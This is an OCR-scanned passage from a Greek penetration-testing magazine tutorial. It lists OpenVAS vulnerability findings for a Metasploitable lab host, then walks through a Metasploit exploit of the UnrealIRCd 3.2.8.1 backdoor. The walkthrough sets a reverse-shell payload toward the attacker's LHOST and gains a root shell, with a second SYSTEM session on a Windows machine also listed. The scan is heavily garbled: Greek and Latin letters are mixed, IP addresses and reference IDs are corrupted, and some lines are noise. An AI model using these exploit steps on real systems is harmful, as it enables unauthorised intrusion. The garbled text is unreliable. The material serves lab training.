-44723,BID-44951,BID-44980, BID-45119, BID-45335, BID-45338, BID-45339, BID-45952 ,BID-45954, BID-46056, BID-46168 
2014-01-30 11 Vuln: host-192.168.85.142 name-http TRACE XSS attack refs-CVE-2004-2320,CVE-2003-1567,BID-9506,BID-9561,BID-11604 
2014-01-30 11 C Vuln: host=192,168,85.142 name=MySQL 5.x Unspecified Buffer Overflow Vulnerability refs=BID-36242 
2014-01-30 11 Vuln: host=192.168.85.142 name-MySQL 'sql parse.cc' Multiple Format String Vulnerabilities refs-CVE-2009-2446,BID-35609 
2014-01-30 11 Vuln: host=192 name-MySQL 5.0.51a Unspecified Remote Code Execution Vulnerability refs-CVE-2009-4484,BID-37640 
2014-01-30 11 9 Vuln: host-192 name=MySQL Denial Of Service and Spoofing Vulnerabilities refs-CVE-2009-4019,CVE-2009-4028 
2014-01-30 11 Vuln: host=192 name=MySQL Multiple Vulnerabilities refs=CVE-2010-1848, CVE-2010-1849, CVE-2010-1850 
2014-01-30 11 Vuln: host=192, name=MySQL Authenticated Access Restrictions Bypass Vulnerability (Linux) refs-CVE-2008-7247 
2014-01-30 Vuln: host=192.168.85.142 name=NFS export refs-CVE-1999-0554,CVE-1999-0548 
Vuln: host=192.168.85.142 name-PostgreSQL Multiple Security Vulnerabilities refs-CVE-2010-1169, CVE-2010-1170, CVE-2010-1447, BID-49215 , CVE -2009-3229, CVE-2009-3 


2014-01-30 : host-192.168.85.142 name-PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability refs=CVE-2009-4034, CVE-2009-4136,BID-373 
7333 
: 2014-01-30 11:16: : host=192,168,85,142 name-PostgreSQL 'bitsubstr' Buffer Overflow Vulnerability refs«CVE-2010-0442,BID-37973 

2014-01-30 : host-192.168.85.142 name-PostgreSQL 'intarray' Module 'gettoken()' Buffer Overflow Vulnerability refs-CVE-2010-4015,BID-46084 

2014-01-30 host=192,168,85.142 name=PostgreSQL PL/Perl and PL/Tcl Local Privilege Escalation Vulnerability refs=CVE-2010-3433,BID-43747 


2014-01-30 host=192.168.85.142 name=PostgreSQL Conversion Encoding Remote Denial of Service Vulnerability refs-CVE-2009-0922,B10-34090 
2014-01-30 host-192.168.85.142 name=PostgreSQL 'RESET ALL' Unauthorized Access Vulnerability refs-CVE-2010-1975,BID-40304 
2014-01-30 host=192.168.85.142 name=ProFTPD Server SQL Injection Vulnerability refs-CVE-2009-0542, CVE-2009-0543 , BID-33722 
2014-01-30 host=192.168.85.142 name=ProFTPD Long Command Handling Security Vulnerability refseCVE-2008-4242,BID-31289 
Time: 2014-01-30 C : host=192,168,85.142 name=ProFTPD mod tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability refs«CVE-2009-3639,BID-36804 


: 2014-01-30 : host=192.168.85.142 name-X Server refs=CVE-1999-0526 
2014-01-30 : host=192,168.85.142 name-PostgreSQL Hash Table Integer Overflow Vulnerability refs=CVE-2010-0733 
2014-01-30 : host-192.168.85.142 name-TCP Sequence Number Approximation Reset Denial of Service Vulnerability refs-CVE-2004-0230,B10-10183 
2014-01-30 : host=192.168.85.142 name=/doc directory browsable ? refs-CVE-1999-0678,BID-318 
2014-01-30 : host-192.168.85.142 name=awiki Multiple Local File Include Vulnerabilities refs-BID-49187 
2014-01-30 : host=192.168.85.142 name-PHP version smaller than 5.2.9 refs-CVE-2008-5498, CVE-2009-1271,CVE-2009-1272,B1D-33002,BID-33927 
: host=192.168.85.142 name=Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability refs=CVE-2012-0053,BID-51706 
: 2014-01-30 : host=192.168.85.142 name-MySQL multiple Vulnerabilities refs-BID-37075,BID-37076 
2014-01-30 : host=192.168.85.142 name-MySQL MyISAM Table Privileges Secuity Bypass Vulnerability refs=CVE-2008-2079 , CVE-2008-4097,CVE-2008-4098,BID-29106 
2014-01-30 C : host«192.168.85.142 name=Oracle MySQL 'TEMPORARY TnnoDB' Tables Denial Of Service Vulnerability refs=CVE-2010-3680,BID-42598 
2014-01-30 : host-192.168.85.142 name=Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities refs-CVE-2010-3677, BID-42646,B1D-42633, BID-42643, BID-4 


τ host-192.168.85.142 name-MySQL Empty Bit-String Literal Denial of Service Vulnerability refs=CVE-2008-3963,BID-31081 
2014-01-30 11 UTC : host=192.168.85.142 name=MySQL 'ALTER DATABASE' Remote Denial Of Service Vulnerability refs-CVE-2010-2008,BID-41198 
2014-01-30 11 UTC : host=192,168.85.142 name=Samba 'client/mount.cifs.c' Remote Denial of Service Vulnerability refs-CVE-2010-0547,BID-38326 
014-01-30 11 UTC : host=192.168.85.142 name=PostgreSQL Low Cost Function Information Disclosure Vulnerability refs=BID-34069 
2014-01-30 11 UTC : host-192.168.85.142 name-openssh-server Forced Command Handling Information Disclosure Vulnerability refs-CVE-2012-0814,BID-51702 
2014-01-30 11 UTC : host=192.168.85.142 name-ICMP Timestamp Detection refs-CVE-1999-0524 
2014-01-30 11 UTC : host=192.168.85.142 name-Anonymous FTP Checking refs-CVE-1999-0497 
11 UTC : host-192.168.85.142 name-Check for Backdoor in unrealircd refs-CVE-2010-2075,B1D-40820, OSVDB-65445 , URL-http: //www.unrealircd.com/txt/unrealsecadvisory. 


Av σας φάνηκαν πολλὲς oi ενεργές υπηρεσίες, ΤΙ έχετε να πείτε yia το πλήθος των 
vulnerabilities που εντόπισε --ἡ τουλάχιστον ἐτσι νομίζει-- το OpenVAS; Εἶναι ποτέ δυνατὸν 
να βγάλουμε ἀκρη, μέσα απὀ αυτόν rov kakó xauó; Κι όμως, av εργαστούμε ἐξυπνα και 
συνδυαστικἀ, εἶναι ;) 


Βεβαίως, φυλλομετρούμε και τη σχετικἠ λίστα µε ra vulnerabilities nou µας έδωσε 
TO OpenVAS. Αν ὁμως γράψουμε vulns 192.168.85.142 θα πάρουμε µια μακροσκελὴ, 
δύσχρηστη λίστα. Ας επικεντρὠσουμε λοιπόν την προσοχὴ µας στις ὀποιες αναφο- 
ρὲς υπάρχουν γύρω απὀ εκεῖνον τον IRC daemon, που µας τράβηξε την προσοχή: 


msf> msf> vulns 192.168.85.142 -s ircd 


[*] Time: 2014-01-30 11:16:39 UTC Vuln: host=192.168.85.142 name=Check for 
Backdoor in unrealircd refs-CVE-2010-2075,BID-40820 


Mia μόνο αναφορά, που kavel Aóyo yia backdoor στην υπηρεσία rou IRC! Πολύ ev- 
διαφέρον auró — και λίγο τρομακτικὀ, ομολογουμένως. Ac δούμε TI σχετικἁ exploit 
modules έχει To Metasploit: 
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msf> grep ircd show exploits 


unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 
3.2.8.1 Backdoor Command Execution 


msf> info unix/irc/unreal_ircd_3281_backdoor 
Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution 
Module: exploit/unix/irc/unreal_ircd_3281_backdoor 
Platform: Unix 
Privileged: No 
License: Metasploit Framework License (BSD) 
Rank: Excellent 
Provided by: 
hdm <hdm@metasploit.com> 
Available targets: 
Id Name 
@ Automatic Target 
Basic options: 


Name Current Setting Required Description 


RHOST yes The target address 
RPORT 6667 yes The target port 
Payload information: 
Space: 1024 
Description: 


This module exploits a malicious backdoor that was added to the 
Unreal IRCD 3.2.8.1 download archive. This backdoor was present in 
the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 
2010. 

References: 
http://cvedetails.com/cve/2010-2075/ 
http: //www.osvdb.org/65445 
http: //www.unrealircd.com/txt/unrealsecadvisory.20100612.txt 


Εκπληκτικὀ! Πήραμε ακριβώς va σχετικὀ exploit, το οποίο μάλιστα ἐχει rank 
"excellent". Παρατηρούμε ὁτι αφορά στην ευρύτερη οικογένεια του Unix κι όχι σε 
κάποιο συγκεκριµένο λειτουργικὀ σύστημα (Automatic Target). Ano τη συνοδευτι- 
κἠ περιγραφή διαπιστώνουμε ὁτι πράγματι ἐχει να κάνει µε backdoor, evo το CVE 
number που παρέχεται στις πληροφορίες του exploit εἶναι ἴδιο µε το CVE number 
που υπάρχει στην αναφορά του OpenVAS! Τίποτε ano όλα αυτά δεν µπορεί va 'vai 
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τυχαίο, γι’ αυτό και προχωράμε αμέσως στην εκτέλεση του exploit: 
msf> use exploit/unix/irc/unreal_ircd_3281_backdoor 
msf exploit(unreal_ircd_3281_backdoor) > show options 
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): 


Name Current Setting Required Description 


RHOST yes The target address 

RPORT 6667 yes The target port 
Exploit target: 

Id Name 


@ Automatic Target 
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.85.142 
RHOST => 192.168.85.142 
msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.85.20 
LHOST => 192.168.85.20 
msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse 
PAYLOAD => cmd/unix/reverse 
msf exploit(unreal_ircd_3281_backdoor) > run 
[*] Started reverse double handler 
[*] Connected to 192.168.85.142:6667... 

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... 


:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your 
hostname; using your IP address instead 


[*] Sending backdoor command... 


* 


Accepted the first client connection... 


* 


Accepted the second client connection... 
Command: echo OTieXDq5Jg2wa8N7 ; 


* 


* 


Writing to socket A 


* 


Writing to socket B 
Reading from sockets... 
Reading from socket B 

B: "OTieXDg5Jg2wa8N7\r\n" 
Matching... 


* 


* 


* 


A is input... 


Command shell session 2 opened (192.168.85.20:4444 -> 
.168.85.142:43359) at 2014-01-30 19:13:45 +0200 


* 


khir rnm rnm rnm Γπ rnm r3 r3 rnm rnm rnm 
* 


wo * 
B3a a ee Έα à al 
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whoami 

root 

[CTRL+Z] 

Background session 2? [y/N] y 

msf exploit(unreal ircd 3281 backdoor) > 


Έχουμε λοιπὀν ἆλλο Eva session, aurr| τη φορά προς ro μηχάνημα pe ro Linux. Na- 
ρατηρήστε την εντολἠ whoami που δώσαμε, η οποία µας φανέρωσε ὁτι στο αποµα- 
KPUOHEVO μηχάνημα βρισκόμαστε στο λογαριασμὀ του υπερχρήστη (root). Βάλαμε 
TO session στο background πατώντας ro συνδυασμὸ πλήκτρων [CTRL+Z], μετὰ το 
[Y] και ὑστερα το [Enter] (δύο φορὲς, yia va εμφανιστεί το prompt Tou meterpreter). 
Με την ακὀλουθη εντολἠ καμαρώνουμε τα δύο sessions nou εγκαθιδρύσαμε, Eva 
προς κάθε μηχάνημα που apxikà σαρώσαμε µε το OpenVAS: 


msf exploit(unreal_ircd_3281_backdoor) > sessions -1 


Active sessions 


Id Type Information Connection 


1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ PARABING-DC 
192.168.85.20:4444 -> 192.168.85.5:3405 (192.168.85.5) 


2 shell unix 
192.168.85.20:4444 -> 192.168.85.142:43359 (192.168.85.142) 


Πριν σας αφήσουμε, va κάνουμε µια --μάλλον περιττή-- σημείωση για TO 
box µε το Linux: Εἶναι βεβαίως ro Metasploitable κι av δεν ἐχετε ακόµα OTIG- 
ξει το δικὀ σας pen-testing lab, θέλουμε να πιστεύουμε ὁτι το παρὀν άρθρο σας 
kave να βάλετε KI αυτή τη δουλειά --για εμάς περισσότερο µε παιχνίδι poid- 
ζει-- στο πρὀγραμμα. Όποτε εἰστε ἑτοιμοι, ξεκινήστε απὀ το deltaCast 501606: 
http://deltahacker.gr/deltacast-s01e06. Καλἠ σας διασκέδαση! 


Θεάματα σαν αυτό αγαλιάζουν την ψυχή rou pen-tester και 
τον γεμίζουν χαρά. H ζωὴ εἶναι και πάλι ωραία — κι όλα θα 
πάνε καλὰ! 


98 


deltahacker.gr 


